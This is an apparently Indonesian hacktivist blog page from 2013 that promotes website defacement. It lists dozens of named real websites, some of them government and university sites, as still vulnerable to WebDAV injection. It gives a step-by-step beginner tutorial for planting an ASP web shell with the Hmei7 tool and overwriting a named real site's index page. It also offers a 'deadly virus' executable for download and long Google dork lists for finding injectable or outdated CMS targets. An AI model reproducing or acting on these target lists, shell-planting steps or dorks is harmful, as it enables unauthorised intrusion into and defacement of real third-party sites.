headline photo

Daftar Situs Webdav Vuln Terbaru 2013

Jumat, 24 Mei 2013

HACKTIVIS NKRI


Daftar Website Vuln WebDav Terbaru Januari 2013
Iseng-iseng nggak ada kerjaan buka lagi tool lama buat deface. Pasti tau kan Tool WebDav buatan kakak Hmei7. Banyak situs yang share 1000 situs vuln Webdav namun kenyataannya situs tersebut sudah tidak bisa diinjek karena sudah di-patch. Nah, karena keisengan tadi, lagsung saja saya cari pakai google dork situs-situs yang masih perawan alias masih vuln sama webdav di awal tahun 2013 ini.

Berikut daftar situs yang masih Vuln WebDav Januari 2013 :

http://dike.dpt.go.th
http://www.shbhgy.com
http://www.vintagefaucet.net/
http://www.blusign.it/
http://www.indal2000.it/
http://www.kozi.com.tw/
http://vendors.csgroupny.com/
http://www.druckpunkt.at/
http://lidu.homesoft.com.cn/
http://www.mazda-gh.tw/
http://www.wiltrom.com.tw/
http://www.dialect.tw/
http://caiwu.hkjulong.com/
http://sportgame.shenzhenfdi.cn/
http://www.szfdi.cn/
http://www.designmonic.se/
http://www.fulaigongwq.com/
http://www.xgzssh.com/
http://oa.cumtec.com/
http://taihelive.com/
http://zhuanqian28.com/
http://ftxx.hyedu.net.cn/
http://www.chitoo.cn/
http://www.zhenhbjzz.cn/
http://www.luoxuanguan.net.cn
http://fe.sziit.edu.cn/
http://www.chfdc.gov.cn/
http://jsj.ahiec.net/
http://tmkzxh.com/
http://lib.nttec.edu.cn/
http://marcatoarredamenti.it/
http://www.adhesive-tapes.it/
http://www.hotelnewtiffanyspark.com/
http://www.giocattoliemodellismo.it
http://www.agnolettoautotrasporti.it/
http://www.gammapoliuretani.it/
http://www.zzhsjxc.com/
http://www.zzhsjxc.com/
http://bh-parts.com/
http://www.vintagefaucet.net/


Sekian postingan dari saya. Semoga bermanfaat bagi WebDavlovers..... Hehehe

Cara Deface Index Website dengan Webdav For Newbie

HACKTIVIS NKRI


 Download Tool
 
step:
1. Buka tool webdav yang telah di download tadi, klik tab 'webdav' lalu pilih 'Asp shell maker'
cara deface website, cara deface index homepage dengan webdav, menggunakan webdav untuk deface index website, cara mudah deface website untuk newbie, cara mengganti index website dengan menggunakan webdav
2. Pada setting Name of Your Shell bisa diubah sesuka kamu sob, lalu klik add site lalu masukkan website target, disini saya menjadikan www.beijingcoal.com/ sebagai target
cara deface website, cara deface index homepage dengan webdav, menggunakan webdav untuk deface index website, cara mudah deface website untuk newbie, cara mengganti index website dengan menggunakan webdav
3. Lalu klik serang!! jika muncul tulisan 'shell created' berarti kita sukses menanam shell ke situs tersebut, namun jika yang muncul 'Not Vulnerable Dav' berarti sobat harus mencari target yang lain karena target sobat tidak vuln terhadap webdav
cara deface website, cara deface index homepage dengan webdav, menggunakan webdav untuk deface index website, cara mudah deface website untuk newbie, cara mengganti index website dengan menggunakan webdav
4. Sekarang kita check hasil shell yang telah tertanam tadi, perhatikan gambar pada step nomor 3 diatas, yang saya beri garis biru adalah letak shellnya, copy ke browser lalu buka link tersebut, contoh: http://www.beijingcoal.com/Hmei7.asp;.txt
5. Setelah masuk ke directory web tersebut silahkan cari file yang kemungkinan adalah index dari web tersebut
cara deface website, cara deface index homepage dengan webdav, menggunakan webdav untuk deface index website, cara mudah deface website untuk newbie, cara mengganti index website dengan menggunakan webdav
6. Stelah ketemu file yang berisi index lalu klik pada icon pensil disampingnya untuk mengedit, hapus semua scriptnya lalu tukar dengan script deface kalian sob, kemudian klik kaydet untuk menyimpan
cara deface website, cara deface index homepage dengan webdav, menggunakan webdav untuk deface index website, cara mudah deface website untuk newbie, cara mengganti index website dengan menggunakan webdav

selamat mencoba

Cara membuat virus mematikan (script edition)

HACKTIVIS NKRI


- Gunakan hanya untuk pembelajaran
- Gunakan dengan sebaiknya

Download
Virus.exe

Dork for Deface

HACKTIVIS NKRI


inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=

" ""Jax Calendar v1.34 by Jack (tR), www.jtr.de/scripting/php"""
" ""Powered By Azadi Network"" "
""" ActiveKB v1.5 Copyright ©"""
""" Powered by JTL-Shop 2"" "
""" Powered by Pie Cart Pro """
""" Powered by Xpoze """
""" created by creato.biz """
"""& Spider Friendly by Crack"""
"""(C) This site is NITROpowered!"""
"""(C) by CyberTeddy"""
"""/index.php?id=cmp-noticias"""
"""/nuke/htmltonuke.php"" - ""htmltonuke.php"""
"""/nuke/iframe.php"""
"""/subcat.php?cate_id="""
"""100% | 50% | 25%"" ""Back to gallery"" inurl:""show.php?imageid="""
"""1999-2004 FuseTalk Inc"" -site:fusetalk.com"
"""2003 DUware All Rights Reserved"""
"""2004-2005 ReloadCMS Team."""
"""2005  www.frank-karau.de"" | ""2006  www.frank-karau.de"""
"""2005 SugarCRM Inc. All Rights Reserved"" ""Powered By SugarCRM"""
"""2006 by www.mani-stats-reader.de.vu"""
"""2007 BookmarkX script"""
"""2007 RADIOZAZA www.radiozaza.de? istek hatti Version 2.5"" "
"""2007 Rafal Kucharski"""
"""2009 Jorp"""
"""ATutor 1.6.4"" "
"""Absolute Poll Manager XE"""
"""AcmlmBoard v1.A2"""
"""Active Webcam Page"" inurl:8080"
"""ActualAnalyzer Lite (free) 2.78""+""Copyright © 2006 ActualScripts"" "
"""Affiliate Network Pro"""
"""All Rights Reserved. Powered by DieselScripts.com"" "
"""AlumniServer project"""
"""Aurora CMS"""
"""Barbecued by sNews"""
"""Basado en Spirate"""
"""Based on DoceboLMS 2.0"""
"""Betrieben mit Serendipity 1.0.3"""
"""BioScripts"""
"""BlackBoard 1.5.1-f | © 2003-4 by Yves Goergen"""
"""BlogMe PHP created by Gamma Scripts"""
"""BosDates Calendar System "" ""powered by BosDates v3.2 by BosDev"""
"""Browse with Interactive Map"""
"""Bu Site Ticimax E-Ticaret yazılımı ile hazırlanmıştır."""
"""By Geeklog"" ""Created this page in"" +seconds +powered "
"""By Geeklog"" ""Created this page in"" +seconds +powered inurl:public_html "
"""CMS Webmanager-pro"""
"""CNStats 2.9"""
"""CaLogic Calendars V1.2.2"""
"""Calendar programming by AppIdeas.com"" filetype:php"
"""ClanSys v.1.1"""
"""Cms.tut.su, 2009 g."""
"""Content managed by the Etomite Content Management System"""
"""Copyright (C) 2000  Phorum Development Team"""
"""Copyright (c) 2004-2006 by Simple PHP Guestbook"" "
"""Copyright 2000 - 2005 Miro International Pty Ltd. All rights reserved"" ""Mambo is Free Software released"""
"""Copyright 2004 easy-content forums"""
"""Copyright 2004 © Digital Scribe v.1.4"""
"""Copyright 2005 Affiliate Directory"""
"""Copyright 2008 ImenAfzar ver :2.0.0.0"""
"""Copyright @2007 Iatek LLC"""
"""Copyright Devellion Limited 2005. All rights reserved."""
"""Copyright Interactivefx.ie"" "
"""Copyright KerviNet"""
"""Copyright MaxiSepet ©"" "
"""Copyright © 2002 Agustin Dondo Scripts"""
"""Copyright-2008@zeejobsite.com"""
"""Copyrights © 2005 Belgische Federale Overheidsdiensten"""
"""CosmoShop by Zaunz Publishing"" inurl:""cgi-bin/cosmoshop/lshop.cgi"" -johnny.ihackstuff.com -V8.10.106 -V8.10.100 -V.8.10.85 -V8.10.108 -V8.11*"
"""Create your own free webring and bring traffic to your website. Join now, it's free!"""
"""Created by weenCompany"" "
"""Creative Guestbook"""
"""Cyphor (Release:"" -www.cynox.ch"
"""CzarNews v1.12 "" | ""CzarNews v1.13"" | ""CzarNews v1.14 """
"""DeeEmm CMS"""
"""Desenvolvido por WeBProdZ"""
"""Desenvolvido por: Fio Mental"""
"""Designed & Developed by N.E.T E-Commerce Group. All Rights Reserved."""
"""Designed & Developed by Zeeways.com"""
"""Designed & Developed by net-finity"""
"""Designed and Developed by Debliteck Ltd"" "
"""Designed and powered by AWS Sports"""
"""Designed by Spaceacre"" "
"""Devana is an open source project !"""
"""Developed by Bispage.com"" "
"""Developed by Infoware Solutions"""
"""Developed by Quate.net."""
"""Developed by rbk"""
"""Diseño Web Hernest Consulting S.L."" "
"""Driven by DokuWiki"""
"""Easy-Clanpage v2.2"""
"""Emanuele Guadagnoli"" ""CcMail"""
"""Emefa Guestbook V 3.0"""
"""Enter ip"" inurl:""php-ping.php"""
"""Everyone should be on TV! Now you can upload 2 TV"""
"""Eyeland Studio Inc. All Rights Reserved."" "
"""Eyeland Studio Inc. All Rights Reserved."" inurl:game.php "
"""FC Bigfeet"" -inurl:mail"
"""Factux le facturier libre V 1.1.5"" "
"""FlatNuke"" ""Valid HTML 4.01!"" ""Valid CSS!"" ""Get RSS 2.0 Feed"" ""Get RSS "
"""FlatNuke"" ""Valid HTML 4.01!"" ""Valid CSS!"" ""Get RSS 2.0 Feed"" ""Get RSS"
"""Forum Active Bulletin Board version 1.1 béta 2"""
"""FrontAccounting"""
"""Galerie 3.2 © 2004 by progressive"""
"""Gallery powered by fMoblog"""
"""Généré par KDPics v1.18"" "
"""Help * Contact * Imprint * Sitemap"" | ""powered by papoo"" | ""powered by cms papoo"""
"""Help desk software by United Web Coders rev. 3.0.640"" "
"""IceWarp Web Mail 5.3.0"" ""Powered by IceWarp"""
"""Ideal BB Version: 0.1"" -idealbb.com"
"""Instant Free File Uploader"" "
"""Internet Photoshow - Slideshow"""
"""Jevonweb Guestbook"""
"""Jinzora Media Jukebox"""
"""Ladder Scripts by http://www.mygamingladder.com"""
"""Ladder Scripts by"""
"""Liberum Help Desk, Copyright (C) 2001 Doug Luxem"""
"""Liberum Help Desk, Copyright (C) 2001 Doug Luxem. Please view the license"
"""LinPHA Version 1.3.x"" or ""The LinPHA developers"" "
"""Maintained with Subscribe Me 2.044.09p""+""Professional"" inurl:""s.pl"""
"""MangoBery 1.0 Alpha"""
"""Marketplace Version 1.1.1"""
"""Members Statistics"" +""Total Members"" +""Guests Online"""
"""MidiCart PHP Database Management"""
"""Mimicboard2 086""+""2000 Nobutaka Makino""+""password""+""message"" inurl:page=1"
"""MobPartner Counter"" ""upload files"" "
"""Multi-Page Comment System"""
"""MunzurSoft Wep Portal W3"""
"""My Photo v1.46.4 © Big Resources"""
"""News Managed by Ditto News"""
"""News generated by Utopia News Pro"" | ""Powered By: Utopia News Pro"""
"""Obtenez votre forum Aztek"" -site:forum-aztek.com"
"""Online Store - Powered by ProductCart"""
"""PHP BP Team""   "
"""PHP Easy Downloader"""
"""PHP Gallery © 2010 PHP Weby hostgator coupon"" "
"""PHP Gallery © 2010 PHP Weby hostgator coupon"""
"""PHP Link Portal v1.95.1 © Big Resources, Inc."""
"""PHP Project Management 0.8.10"""
"""PHP WEBQUEST VERSION "" or inurl:""/phpwebquest/"" "
"""PHPAuction GPL Enhanced V2.51 by AuctionCode.com"" "
"""PHPGlossar Version 0.8"""
"""PHPNews Version 0.93"""
"""PHPWebAdmin for hMailServer"" intitle:PHPWebAdmin -site:hmailserver.com"
"""PKs Movie Database"""
"""POWERED BY ALITALK"""
"""POWERED BY LOG1 CMS"""
"""POWERED BY PHPNUKE.IR"""
"""POWERED BY ZIPBOX MEDIA"" inurl:""album.php"""
"""POWERED BY: WEBINSPIRE"""
"""Page created in"" ""seconds by glFusion"" +RSS"
"""ParsBlogger  ? 2006. All rights reserved"""
"""Personal .NET Portal"""
"""PhpCollab . Log In"" | ""NetOffice . Log In"" | (intitle:""index.of."" intitle:phpcollab|netoffice inurl:phpcollab|netoffice -gentoo)"
"""PhpLinkExchange v1.02"" "
"""Power by Blakord Portal"""
"""Power by:RichStrong CMS"""
"""PowerMovieList 0.14 Beta Copyright"""
"""Powerd by www.e-webtech.com"" "
"""Powerd by www.e-webtech.com"""
"""Powered *: newtelligence"" (""dasBlog 1.6""| ""dasBlog 1.5""| ""dasBlog 1.4""|""dasBlog 1.3"")"
"""Powered By 0DayDB v2.3"""
"""Powered By 4smart"" "
"""Powered By 4smart"""
"""Powered By : Yamamah Version 1.00"" "
"""Powered By AV Arcade"""
"""Powered By Aardvark Topsites PHP 4.2.2"""
"""Powered By AlstraSoft AskMe Pro"""
"""Powered By Aqua Cms"""
"""Powered By Basic CMS SweetRice"""
"""Powered By CMS-BRD"""
"""Powered By CrownWeb.net!"" inurl:""page.cfm"""
"""Powered By Dejcom Market CMS"""
"""Powered By Dew-NewPHPLinks v.2.1b"""
"""Powered By DynamicPAD"""
"""Powered By EgyPlus"""
"""Powered By Gravity Board X v2.0 BETA"""
"""Powered By HASHE"""
"""Powered By IP.Board 3.0.0 Beta 5"""
"""Powered By OpenCart"""
"""Powered By PageAdmin CMS Free Version"""
"""Powered By Pligg"" + ""Legal: License and Source"""
"""Powered By ScozNews"""
"""Powered By Steamcast ""0.9.75 beta"
"""Powered By The Black Lily 2007"""
"""Powered By W3infotech"""
"""Powered By Webcards"""
"""Powered By X7 Chat"""
"""Powered By Zoopeer"""
"""Powered By diskos"""
"""Powered By phpBB Garage 1.2.0"""
"""Powered By phpCOIN 1.2.2"""
"""Powered By phpCOIN v1.2.1"" / ""mod.php?mod=faq""  "
"""Powered By: lucidCMS 1.0.11"""
"""Powered by     YDC"""
"""Powered by  MetInfo  2.0"""
"""Powered by  MetInfo 3.0"""
"""Powered by  vlBook 1.21"""
"""Powered by  www.aspportal.net"""
"""Powered by 68kb"" "
"""Powered by : elkagroup.com"" "
"""Powered by A-CART"""
"""Powered by AJ-Fork v.167"""
"""Powered by AMCMS3"""
"""Powered by Absolute File Send"""
"""Powered by Absolute Podcast"""
"""Powered by Active PHP Bookmarks v1.3"" inurl:.view_group.php?id= "
"""Powered by Ajax Portal 3.0"""
"""Powered by AlstraSoft SendIt Pro"""
"""Powered by Atomic Photo Album"" inurl:""photo.php?apa_album_ID="""
"""Powered by AzDg"" (2.1.3 | 2.1.2 | 2.1.1)"
"""Powered by BIGACE 2.4"""
"""Powered by BIGACE 2.5"""
"""Powered by BLOG:CMS""|""Powered by blogcms.com""|""2003-2004, Radek Hulán"""
"""Powered by Battle Blog"""
"""Powered by BosClassifieds Classified Ads System"""
"""Powered by Burning Board Lite 1.0.2 * 2001-2004"""
"""Powered by Burning Board Lite 1.0.2"" or ""Powered by Burning Board 2.3.6"""
"""Powered by Burning Board"" -exploit -johnny"
"""Powered by CCLeague Pro"""
"""Powered by CMS.GE"""
"""Powered by CMScout ©2005 CMScout Group"""
"""Powered by CMSimple"""
"""Powered by ClanAdmin Tools v1.4.2"""
"""Powered by ClanTiger"" "
"""Powered by ClanTiger"""
"""Powered by Claroline"" -demo"
"""Powered by Clicknet CMS"""
"""Powered by Clipshare"""
"""Powered by Comdev News Publisher"""
"""Powered by ComicShout"""
"""Powered by CommonSense CMS"" "
"""Powered by Content Injector v1.52"""
"""Powered by Content Injector v1.53"""
"""Powered by Coppermine Photo Gallery"" ( ""v1.2.2 b"" | ""v1.2.1"" | ""v1.2"" | ""v1.1"" | ""v1.0"")"
"""Powered by Coppermine Photo Gallery"""
"""Powered by CubeCart 3.0.4"" "
"""Powered by CubeCart"""
"""Powered by CuteNews"""
"""Powered by DCP-Portal v5.5"""
"""Powered by DMXReady Site Chassis Manager"" -site:dmxready.com"
"""Powered by DVHome.cn"""
"""Powered by DWdirectory"""
"""Powered by DZcms"""
"""Powered by Dayfox Designs"""
"""Powered by DesClub.com - phpLinkat"""
"""Powered by DigitalHive"""
"""Powered by Download 3000"""
"""Powered by Drake CMS"" inurl:index.php?option=guestbook"
"""Powered by Drumbeat"" inurl:index02.php "
"""Powered by ECShop v2.5.0"""
"""Powered by EPay Enterprise"" inurl:""shop.htm?cid="" | nurl:""shop.php?cid="""
"""Powered by EZCMS"""
"""Powered by Elgg, the leading open source social networking platform"""
"""Powered by Espinas IT"" "
"""Powered by ExBB """
"""Powered by F3Site"""
"""Powered by FUDForum 2.6"" -site:fudforum.org -johnny.ihackstuff"
"""Powered by FUDForum 2.7"" -site:fudforum.org -johnny.ihackstuff"
"""Powered by FUDforum"""
"""Powered by Fantastic News v2.1.2"" or ""Powered by Fantastic News v2.1.3"""
"""Powered by FlashGameScript"""
"""Powered by ForumApp"""
"""Powered by FreeWebshop"""
"""Powered by FreeWebshop.org 2.2.1"""
"""Powered by FubarForum v1.5"""
"""Powered by FubarForum v1.6"""
"""Powered by GGCMS"""
"""Powered by GTChat 0.95""+""User Login""+""Remember my login information"""
"""Powered by Gallery v1.4.4"""
"""Powered by GameSiteScript"""
"""Powered by GeN4"""
"""Powered by GetMyOwnArcade"""
"""Powered by Glossword 1.8.11"" OR ""Powered by Glossword 1.8.6"""
"""Powered by Gravy Media"""
"""Powered by Grayscale Blog"""
"""Powered by How2asp"""
"""Powered by IMGallery"""
"""Powered by INVOhost"""
"""Powered by IceWarp Software"" inurl:mail"
"""Powered by Ikonboard 3.1.1"""
"""Powered by Invision Power Board(U) v1.3 Final"""
"""Powered by KaiBB 1.0.1"""
"""Powered by Knowledge Base"""
"""Powered by LDU"""
"""Powered by Leap"""
"""Powered by LifeType"" ""RSS 0.90"" ""RSS 1.0"" ""RSS 2.0"" ""Valid XHTML 1.0 Strict and CSS"""
"""Powered by LightBlog"" - Powered by LightBlog"
"""Powered by LightNEasy"""
"""Powered by Locazolist Copyright © 2006"""
"""Powered by LoudBlog"""
"""Powered by Loudblog"""
"""Powered by MD-Pro"" | ""made with MD-Pro"""
"""Powered by MDForum"""
"""Powered by Maian Recipe v1.0"""
"""Powered by Md-Pro"""
"""Powered by Megabook *"" inurl:guestbook.cgi"
"""Powered by MercuryBoard [v1"""
"""Powered by MercuryBoard"""
"""Powered by Minerva"""
"""Powered by MobPartner"" inurl:""chat.php"""
"""Powered by My Blog"" intext:""FuzzyMonkey.org"""
"""Powered by My PHP Indexer 1.0"""
"""Powered by MySpace Content Zone"""
"""Powered by NovaBoard v1.0.0"""
"""Powered by NovaBoard v1.1.2"""
"""Powered by Nukedit"""
"""Powered by OnePound"""
"""Powered by Online Grades"""
"""Powered by Orca Interactive Forum Script"""
"""Powered by Ovidentia"""
"""Powered by PG Online Training Solution - learning management system"""
"""Powered by PG Real Estate Solution - real estate web site design"""
"""Powered by PG Roomate Finder Solution - roommate estate web site design"""
"""Powered by PHP Advanced Transfer Manager v1.30"""
"""Powered by PHP Director 0.2"""
"""Powered by PHP Director"""
"""Powered by PHP Live! v3.3"""
"""Powered by PHP Photo Album"""
"""Powered by PHP Shop from DeltaScripts"""
"""Powered by PHP iCalendar"""
"""Powered by PHP-Fusion v6.00.110"" | ""Powered by PHP-Fusion v6.00.2.."" | ""Powered by PHP-Fusion v6.00.3.."" -v6.00.400 -johnny.ihackstuff"
"""Powered by PHP-Update"" -site:www.php-update.co.uk"
"""Powered by PHPBasket"""
"""Powered by PHPizabi v0.848b C1 HFP1"""
"""Powered by PMOS Help Desk"""
"""Powered by PWP Version 1-5-1"" AND inurl:""/wiki/run.php"""
"""Powered by ParsBlogger"""
"""Powered by Philboard"" inurl:""philboard_forum.asp"""
"""Powered by Populum"" "
"""Powered by PowerPortal v1.3"""
"""Powered by ProjectCMS"""
"""Powered by PsNews""   "
"""Powered by PunBB"""
"""Powered by Quick.Cart"""
"""Powered by Quick.Cms"""
"""Powered by RGameScript"""
"""Powered by RW::Download v2.0.3 lite"""
"""Powered by Real Estate Portal"""
"""Powered by RealAdmin and Red Cow Technologies, Inc."" "
"""Powered by Reciprocal Links Manager"""
"""Powered by RedCat"" inurl:index.php?contentId= "
"""Powered by Rock Band CMS 0.10"" "
"""Powered by SLAED CMS"""
"""Powered by SMF"""
"""Powered by SOFTMAN"""
"""Powered by SOOP Portal Raven 1.0b"""
"""Powered by SazCart"""
"""Powered by Scallywag"" "
"""Powered by Scratcher"" "
"""Powered by Scripteen Free Image Hosting Script V 2.3"""
"""Powered by Scripteen Free Image Hosting Script V1.2"""
"""Powered by Seditio"""
"""Powered by Shadowed Portal"""
"""Powered by Shop-Script FREE"""
"""Powered by Shout!"""
"""Powered by Simple PHP Text newsletter"""
"""Powered by Simplog"""
"""Powered by SiteEngine"""
"""Powered by SiteX 0.7 Beta""   "
"""Powered by Smoothflash"""
"""Powered by SocketMail Lite version 2.2.8. Copyright © 2002-2006"""
"""Powered by SoftbizScripts"" ""ALL JOBS"""
"""Powered by SoftbizScripts"" ""OUR SPONSORS"""
"""Powered by SoftbizScripts"" inurl:""searchresult.php?sbcat_id="""
"""Powered by SoftbizScripts"" inurl:store_info.php"
"""Powered by TS Special Edition"" "
"""Powered by TinyPHPForum v3.61"""
"""Powered by UCStats version 1.1"" "
"""Powered by UNAK-CMS"""
"""Powered by UNO.com.my"""
"""Powered by UPB"" (b 1.0)|(1.0 final)|(Public Beta 1.0b)"
"""Powered by UPB"""
"""Powered by VS PANEL 7.5.5"""
"""Powered by VS PANEL"""
"""Powered by Vsns Lemon"" intitle:""Vsns Lemon"""
"""Powered by WSN Guest"" "
"""Powered by WebStudio eCatalogue"""
"""Powered by WebStudio eHotel"""
"""Powered by WebText"""
"""Powered by Woltlab Burning Board"" -""2.3.3"" -""v2.3.3"" -""v2.3.2"" -""2.3.2"""
"""Powered by WordPress"" -html filetype:php -demo -wordpress.org -bugtraq"
"""Powered by WowBB"" -site:wowbb.com"
"""Powered by XHP CMS"" -ihackstuff -exploit -xhp.targetit.ro"
"""Powered by XMB"""
"""Powered by XOOPS 2.2.3 Final"""
"""Powered by Xaraya"" ""Copyright 2005"""
"""Powered by Xplode CMS"""
"""Powered by YaPig V0.92b"""
"""Powered by YourTube v1.0"""
"""Powered by ZeeMatri"""
"""Powered by Zomplog"""
"""Powered by Zorum 3.5"""
"""Powered by [ iSupport 1.8 ]"""
"""Powered by and copyright class-1""  0.24.4"
"""Powered by autolinks pro 2.1"" inurl:register.php"
"""Powered by bSpeak 1.10"""
"""Powered by beamospetition 1.0.12"""
"""Powered by bp blog 6.0"""
"""Powered by cifshanghai.com"" "
"""Powered by cityadmin and Red Cow Technologies, Inc."""
"""Powered by cpCommerce"""
"""Powered by eXV2 Vers"""
"""Powered by ezContents Version 1.4.5"""
"""Powered by i-pos Storefront"""
"""Powered by iNetScripts"" "
"""Powered by iScripts SocialWare"""
"""Powered by ispCP Omega"" "
"""Powered by jSite 1.0 OE"""
"""Powered by mlffat"""
"""Powered by mnoGoSearch - free web search engine software"""
"""Powered by mojoPortal"" "
"""Powered by myBusinessAdmin and Red Cow Technologies, Inc."""
"""Powered by myUPB"" "
"""Powered by nzFotolog v0.4.1 © 2005-2006 Ricardo Amaral"" "
"""Powered by ocPortal"" -demo -ocportal.com"
"""Powered by osCMax v2.0"" , ""Copyright @"" ""RahnemaCo.com"" "
"""Powered by photokorn"""
"""Powered by phpCC Beta 4.2"""
"""Powered by phpMySport"""
"""Powered by sNews "" inurl:index.php?id= "
"""Powered by sNews"" "
"""Powered by samart-cms"""
"""Powered by sendcard - an advanced PHP e-card program"" -site:sendcard.org"
"""Powered by sendcard - an advanced PHP e-card program"""
"""Powered by visinia"""
"""Powered by web directory script"""
"""Powered by webSPELL"""
"""Powered by words tag script"""
"""Powered by wpQuiz"" inurl:index.php "
"""Powered by wpQuiz"""
"""Powered by xchangeboard"""
"""Powered by xeCMS"""
"""Powered by yacs"""
"""Powered by yappa-ng 2.3.1"" AND ""Powered by yappa-ng 2.3.1"""
"""Powered by yappa-ng"""
"""Powered by: Arab Portal v2"""
"""Powered by: Censura"""
"""Powered by: Elite Gaming Ladders v3.2"""
"""Powered by: IRIran.net"""
"""Powered by: Land Down Under 800"" |  ""Powered by: Land Down Under 801"" - www.neocrome.net"
"""Powered by: MFH v1"""
"""Powered by: MyPHP Forum"""
"""Powered by: PHP Link Directory"""
"""Powered by: PhotoPost PHP 4.6"" or ""Powered by: PhotoPost PHP 4.5"""
"""Powered by: PhotoPost PHP 4.6.5"" "
"""Powered by: PostGuestbook 0.6.1"""
"""Powered by: PreProjects"""
"""Powered by: Southburn"""
"""Powered by: Yes Solutions"" "
"""Powered by: eSmile"""
"""Powered by: vBulletin * 3.0.1""  inurl:newreply.php"
"""Powie's PSCRIPT MatchMaker 4.05"""
"""REALTOR 747 - Version 4.11"""
"""RS MAXSOFT"""
"""Review Script"" ""Phil Taylor"""
"""Runcms Copyright"" ""2002 - 2007"" +""page created"""
"""S-CMS by matteoiamma"""
"""SOOP Portal 2.0"""
"""SQuery 4.5"" |""SQuery 4.0"" |""SQuery 3.9"" | inurl:""modules.php?name=SQuery"""
"""Scientific Image DataBase"""
"""Script réalisé par BinGo PHP"""
"""Search Adult Directory:"""
"""Search Affiliate Programs:"""
"""Search Projects"" intitle:""The ultimate project website"""
"""Search | Invite | Mail | Blog | Forum"""
"""Send amazing greetings to your friends and relative!"" "
"""Send amazing greetings to your friends and relative!"""
"""ShopMaker v1.0"""
"""Signkorn Guestbook 1.3"""
"""SimpleBlog 2.3 by 8pixel.net"""
"""Sinapis by scripter.ch"""
"""Site designed and built Powered by GlobalWebTek."""
"""Site designed and built by Powder Blue."" inurl:index.php?id_page="
"""Site designed and built by ProWeb Associates."""
"""Site powered By Limbo CMS"""
"""Site powered by GuppY"" | ""Site créé avec GuppY"" +inurl:lng="
"""Site powered by GuppY"""
"""Site produced by GeneralProducts.co.uk"""
"""Sitedesign by: Dieleman www.dieleman.nl - Copyright © 2010"" "
"""Siteman Version 1.1.9"""
"""SmodBIP"" & ""Aktualno.ci"""
"""SmodCMS"" & ""S.ownik"""
"""Software Categories"" ""Featured Resources"" ""Search"""
"""Software PBLang 4.66z"" AND ""Software PBLang 4.60"" OR ""Software PBLang"""
"""Software PBLang"" 4.65 filetype:php"
"""Splatt Forum©"""
"""SquirrelMail version 1.4.4"" inurl:src ext:php"
"""Starting bid"" ""Powered by SoftbizScripts"" "
"""TR Newsportal"" brought by TRanx."
"""TROforum 0.1"""
"""Tanyakan Pada Rumput Yang Bergoyang""  "
"""Tanyakan Pada Rumput Yang Bergoyang"""
"""Thank You for using WPCeasy"""
"""The Merchant Project"""
"""These forums are running on"" ""miniBB"""
"""This forum powered by Phorum."""
"""This is a Free & Open Source mailing list manager"""
"""This page has been automatically generated by Plesk Server Administrator"""
"""This script created by www.script.canavari.com"""
"""This script was created by Php-ZeroNet"" ""Script . Php-ZeroNet"""
"""This site is powered by CMS Made Simple version 1."""
